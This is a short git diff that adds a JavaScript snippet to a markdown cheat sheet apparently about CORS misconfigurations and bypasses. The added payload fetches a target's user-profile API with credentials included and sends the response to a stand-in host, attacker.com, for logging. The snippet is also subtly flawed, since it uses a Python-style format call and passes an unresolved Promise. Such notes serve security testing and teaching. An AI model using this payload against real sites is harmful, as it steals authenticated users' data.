diff --git a/CORS - Misconfigurations & Bypass.md b/CORS - Misconfigurations & Bypass.md
index 68abf53..8206245 100644
--- a/CORS - Misconfigurations & Bypass.md	
+++ b/CORS - Misconfigurations & Bypass.md	
@@ -30,6 +30,15 @@ xhr.withCredentials = true;
 xhr.send(null);
 ```
 
+```javascript
+fetch("https://target.com/api/user/profile", {
+	credentials: "include"
+})
+.then((response) => {
+	document.location = "//attacker.com/log?key={0}".format(response.text());
+});
+```
+
 ```javascript
 fetch(url, {
   credentials: 'include'